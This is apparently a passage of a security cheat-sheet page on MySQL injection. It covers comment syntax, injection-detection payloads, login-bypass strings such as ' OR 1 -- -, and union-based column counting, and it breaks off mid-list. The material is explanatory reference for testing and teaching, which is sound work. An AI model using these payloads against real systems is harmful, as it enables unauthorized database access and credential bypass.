<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../File%20Inclusion/LFI-to-RCE/" class="md-nav__link">
<span class="md-ellipsis">
LFI to RCE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../File%20Inclusion/Wrappers/" class="md-nav__link">
<span class="md-ellipsis">
Inclusion Using Wrappers
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Headless Browser
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Headless Browser
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Headless%20Browser/" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Cloud Instances
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/ASP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - ASP.NET
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/Java/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Java
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/JavaScript/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - JavaScript
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/PHP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - PHP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/Python/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Python
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Ruby
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53_2" >
<label class="md-nav__link" for="__nav_53_2" id="__nav_53_2_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_53_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53_2">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" >
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XSS%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/1%20-%20XSS%20Filter%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
XSS Filter Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/2%20-%20XSS%20Polyglot/" class="md-nav__link">
<span class="md-ellipsis">
Polyglot XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/3%20-%20XSS%20Common%20WAF%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Common WAF Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/4%20-%20CSP%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
CSP Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/5%20-%20XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_60" >
<label class="md-nav__link" for="__nav_60" id="__nav_60_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_60_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_60">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_61" >
<label class="md-nav__link" for="__nav_61" id="__nav_61_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_61_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_61">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_62" >
<label class="md-nav__link" for="__nav_62" id="__nav_62_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_62_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_62">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<h1 id="mysql-injection">MySQL Injection</h1>
<blockquote>
<p>MySQL Injection is a security vulnerability that occurs when an attacker can manipulate the SQL queries sent to a MySQL database by injecting malicious input. It is usually the result of improperly handled user input, and it allows an attacker to execute arbitrary SQL code that can compromise the database's integrity and security.</p>
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#mysql-default-databases">MYSQL Default Databases</a></li>
<li><a href="#mysql-comments">MYSQL Comments</a></li>
<li><a href="#mysql-testing-injection">MYSQL Testing Injection</a></li>
<li><a href="#mysql-union-based">MYSQL Union Based</a><ul>
<li><a href="#detect-columns-number">Detect Columns Number</a><ul>
<li><a href="#iterative-null-method">Iterative NULL Method</a></li>
<li><a href="#order-by-method">ORDER BY Method</a></li>
<li><a href="#limit-into-method">LIMIT INTO Method</a></li>
</ul>
</li>
<li><a href="#extract-database-with-information_schema">Extract Database With Information_schema</a></li>
<li><a href="#extract-columns-name-without-information_schema">Extract Columns Name Without Information_Schema</a></li>
<li><a href="#extract-data-without-columns-name">Extract Data Without Columns Name</a></li>
</ul>
</li>
<li><a href="#mysql-error-based">MYSQL Error Based</a><ul>
<li><a href="#mysql-error-based-basic">MYSQL Error Based - Basic</a></li>
<li><a href="#mysql-error-based-updatexml-function">MYSQL Error Based - UpdateXML Function</a></li>
<li><a href="#mysql-error-based-extractvalue-function">MYSQL Error Based - Extractvalue Function</a></li>
</ul>
</li>
<li><a href="#mysql-blind">MYSQL Blind</a><ul>
<li><a href="#mysql-blind-with-substring-equivalent">MYSQL Blind With Substring Equivalent</a></li>
<li><a href="#mysql-blind-using-a-conditional-statement">MYSQL Blind Using A Conditional Statement</a></li>
<li><a href="#mysql-blind-with-make_set">MYSQL Blind With MAKE_SET</a></li>
<li><a href="#mysql-blind-with-like">MYSQL Blind With LIKE</a></li>
<li><a href="#mysql-blind-with-regexp">MySQL Blind With REGEXP</a></li>
</ul>
</li>
<li><a href="#mysql-time-based">MYSQL Time Based</a><ul>
<li><a href="#using-sleep-in-a-subselect">Using SLEEP in a Subselect</a></li>
<li><a href="#using-conditional-statements">Using Conditional Statements</a></li>
</ul>
</li>
<li><a href="#mysql-dios-dump-in-one-shot">MYSQL DIOS - Dump in One Shot</a></li>
<li><a href="#mysql-current-queries">MYSQL Current Queries</a></li>
<li><a href="#mysql-read-content-of-a-file">MYSQL Read Content of a File</a></li>
<li><a href="#mysql-command-execution">MYSQL Command Execution</a><ul>
<li><a href="#webshell-outfile-method">WEBSHELL - OUTFILE method</a></li>
<li><a href="#webshell-dumpfile-method">WEBSHELL - DUMPFILE method</a></li>
<li><a href="#command-udf-library">COMMAND - UDF Library</a></li>
</ul>
</li>
<li><a href="#mysql-insert">MYSQL INSERT</a></li>
<li><a href="#mysql-truncation">MYSQL Truncation</a></li>
<li><a href="#mysql-out-of-band">MYSQL Out of Band</a><ul>
<li><a href="#dns-exfiltration">DNS Exfiltration</a></li>
<li><a href="#unc-path-ntlm-hash-stealing">UNC Path - NTLM Hash Stealing</a></li>
</ul>
</li>
<li><a href="#mysql-waf-bypass">MYSQL WAF Bypass</a><ul>
<li><a href="#alternative-to-information-schema">Alternative to Information Schema</a></li>
<li><a href="#alternative-to-version">Alternative to VERSION</a></li>
<li><a href="#alternative-to-group_concat">Alternative to GROUP_CONCAT</a></li>
<li><a href="#scientific-notation">Scientific Notation</a></li>
<li><a href="#conditional-comments">Conditional Comments</a></li>
<li><a href="#wide-byte-injection-gbk">Wide Byte Injection (GBK)</a></li>
</ul>
</li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="mysql-default-databases">MYSQL Default Databases</h2>
<table>
<thead>
<tr>
<th>Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>mysql</td>
<td>Requires root privileges to access</td>
</tr>
<tr>
<td>information_schema</td>
<td>Available from MySQL version 5 onward</td>
</tr>
</tbody>
</table>
<h2 id="mysql-comments">MYSQL Comments</h2>
<p>MySQL comments are annotations in SQL code that are ignored by the MySQL server during execution.</p>
<table>
<thead>
<tr>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>#</code></td>
<td>Hash comment</td>
</tr>
<tr>
<td><code>/* MYSQL Comment */</code></td>
<td>C-style comment</td>
</tr>
<tr>
<td><code>/*! MYSQL Special SQL */</code></td>
<td>Executable comment (MySQL-specific SQL that MySQL runs but other DBMS treat as a comment)</td>
</tr>
<tr>
<td><code>/*!32302 10*/</code></td>
<td>Version-conditional comment: executed only on MySQL 3.23.02 or later</td>
</tr>
<tr>
<td><code>--</code></td>
<td>SQL comment (MySQL requires whitespace after <code>--</code>, which is why payloads use the <code>-- -</code> form)</td>
</tr>
<tr>
<td><code>;%00</code></td>
<td>Null byte</td>
</tr>
<tr>
<td>`</td>
<td>Backtick</td>
</tr>
</tbody>
</table>
<h2 id="mysql-testing-injection">MYSQL Testing Injection</h2>
<ul>
<li>
<p><strong>Strings</strong>: Query like <code>SELECT * FROM Table WHERE id = 'FUZZ';</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a>&#39; False
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a>&#39;&#39; True
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a>&quot; False
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a>&quot;&quot; True
<a id="__codelineno-0-5" name="__codelineno-0-5" href="#__codelineno-0-5"></a>\ False
<a id="__codelineno-0-6" name="__codelineno-0-6" href="#__codelineno-0-6"></a>\\ True
</code></pre></div></p>
</li>
<li>
<p><strong>Numeric</strong>: Query like <code>SELECT * FROM Table WHERE id = FUZZ;</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="n">AND</span> <span class="n">1</span> <span class="n">True</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="n">AND</span> <span class="n">0</span> <span class="n">False</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="n">AND</span> <span class="n">true</span> <span class="n">True</span>
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="n">AND</span> <span class="n">false</span> <span class="n">False</span>
<a id="__codelineno-1-5" name="__codelineno-1-5" href="#__codelineno-1-5"></a><span class="n">1-false</span> <span class="n">Returns</span> <span class="n">1</span> <span class="k">if</span> <span class="n">vulnerable</span>
<a id="__codelineno-1-6" name="__codelineno-1-6" href="#__codelineno-1-6"></a><span class="n">1-true</span> <span class="n">Returns</span> <span class="n">0</span> <span class="k">if</span> <span class="n">vulnerable</span>
<a id="__codelineno-1-7" name="__codelineno-1-7" href="#__codelineno-1-7"></a><span class="n">1</span><span class="p">*</span><span class="n">56</span> <span class="n">Returns</span> <span class="n">56</span> <span class="k">if</span> <span class="n">vulnerable</span>
<a id="__codelineno-1-8" name="__codelineno-1-8" href="#__codelineno-1-8"></a><span class="n">1</span><span class="p">*</span><span class="n">56</span> <span class="n">Returns</span> <span class="n">1</span> <span class="k">if</span> <span class="n">not</span> <span class="n">vulnerable</span>
</code></pre></div></p>
</li>
<li>
<p><strong>Login</strong>: Query like <code>SELECT * FROM Users WHERE username = 'FUZZ1' AND password = 'FUZZ2';</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="s1">&#39; OR &#39;</span><span class="n">1</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="s1">&#39; OR 1 -- -</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="s1">&quot; OR &quot;&quot; = &quot;</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="s1">&quot; OR 1 = 1 -- -</span>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a><span class="s1">&#39;</span><span class="p">=</span><span class="s1">&#39;</span>
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="s1">&#39;</span><span class="n">LIKE</span><span class="s1">&#39;</span>
<a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a><span class="s1">&#39;</span><span class="p">=</span><span class="n">0</span><span class="p">--+</span>
</code></pre></div></p>
</li>
</ul>
<h2 id="mysql-union-based">MYSQL Union Based</h2>
<h3 id="detect-columns-number">Detect Columns Number</h3>
<p>To successfully perform a union-based SQL injection, an attacker needs to know the number of columns in the original query.</p>
<h4 id="iterative-null-method">Iterative NULL Method</h4>
<p>Systematically increase the number of columns in the <code>UNION SELECT</code> statement until the payload executes without errors or produces a visible change. Each iteration checks the compatibility of the column count.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">NULL</span><span class="p">;</span><span class="c1">--</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="p">;</span><span class="c1">-- </span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="p">;</span><span class="c1">-- </span>
</code></pre></div>
<h4 id="order-by-method">ORDER BY Method</h4>
<p>Keep incrementing the column index until you get a <code>False</code> response, because ordering or grouping by a column position beyond the number of selected columns is invalid. Even though <code>GROUP BY</code> and <code>ORDER BY</code> have different functionality in SQL, they can both be used in exactly the same fashion to determine the number of columns in the query.</p>
<table>
<thead>
<tr>
<th>ORDER BY</th>
<th>GROUP BY</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>ORDER BY 1--+</code></td>
<td><code>GROUP BY 1--+</code></td>
<td>True</td>
</tr>
<tr>
<td><code>ORDER BY 2--+</code></td>
<td><code>GROUP BY 2--+</code></td>
<td>True</td>
</tr>
<tr>
<td><code>ORDER BY 3--+</code></td>
<td><code>GROUP BY 3--+</code></td>
<td>True</td>
</tr>
<tr>
<td><code>ORDER BY 4--+</code></td>
<td><code>GROUP BY 4--+</code></td>
<td>False</td>
</tr>
</tbody>
</table>
<p>Since the result is false for <code>ORDER BY 4</code>, the SQL query has only 3 columns.
In a <code>UNION</code>-based SQL injection, you can then <code>SELECT</code> arbitrary data to display on the page: <code>-1' UNION SELECT 1,2,3--+</code>.</p>
<p>Similar to the previous method, the number of columns can be checked with a single request if error reporting is enabled: the error message reveals the first column position that does not exist.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="k">ORDER</span><span class="w"> </span><span class="k">BY</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="mi">7</span><span class="p">,</span><span class="mi">8</span><span class="p">,</span><span class="mi">9</span><span class="p">,</span><span class="mi">10</span><span class="p">,</span><span class="mi">11</span><span class="p">,</span><span class="mi">12</span><span class="p">,</span><span class="mi">13</span><span class="p">,</span><span class="mi">14</span><span class="p">,</span><span class="mi">15</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">17</span><span class="p">,</span><span class="mi">18</span><span class="p">,</span><span class="mi">19</span><span class="p">,</span><span class="mi">20</span><span class="p">,</span><span class="mi">21</span><span class="p">,</span><span class="mi">22</span><span class="p">,</span><span class="mi">23</span><span class="p">,</span><span class="mi">24</span><span class="p">,</span><span class="mi">25</span><span class="p">,</span><span class="mi">26</span><span class="p">,</span><span class="mi">27</span><span class="p">,</span><span class="mi">28</span><span class="p">,</span><span class="mi">29</span><span class="p">,</span><span class="mi">30</span><span class="p">,</span><span class="mi">31</span><span class="p">,</span><span class="mi">32</span><span class="p">,</span><span class="mi">33</span><span class="p">,</span><span class="mi">34</span><span class="p">,</span><span class="mi">35</span><span class="p">,</span><span class="mi">36</span><span 
class="p">,</span><span class="mi">37</span><span class="p">,</span><span class="mi">38</span><span class="p">,</span><span class="mi">39</span><span class="p">,</span><span class="mi">40</span><span class="p">,</span><span class="mi">41</span><span class="p">,</span><span class="mi">42</span><span class="p">,</span><span class="mi">43</span><span class="p">,</span><span class="mi">44</span><span class="p">,</span><span class="mi">45</span><span class="p">,</span><span class="mi">46</span><span class="p">,</span><span class="mi">47</span><span class="p">,</span><span class="mi">48</span><span class="p">,</span><span class="mi">49</span><span class="p">,</span><span class="mi">50</span><span class="p">,</span><span class="mi">51</span><span class="p">,</span><span class="mi">52</span><span class="p">,</span><span class="mi">53</span><span class="p">,</span><span class="mi">54</span><span class="p">,</span><span class="mi">55</span><span class="p">,</span><span class="mi">56</span><span class="p">,</span><span class="mi">57</span><span class="p">,</span><span class="mi">58</span><span class="p">,</span><span class="mi">59</span><span class="p">,</span><span class="mi">60</span><span class="p">,</span><span class="mi">61</span><span class="p">,</span><span class="mi">62</span><span class="p">,</span><span class="mi">63</span><span class="p">,</span><span class="mi">64</span><span class="p">,</span><span class="mi">65</span><span class="p">,</span><span class="mi">66</span><span class="p">,</span><span class="mi">67</span><span class="p">,</span><span class="mi">68</span><span class="p">,</span><span class="mi">69</span><span class="p">,</span><span class="mi">70</span><span class="p">,</span><span class="mi">71</span><span class="p">,</span><span class="mi">72</span><span class="p">,</span><span class="mi">73</span><span class="p">,</span><span class="mi">74</span><span 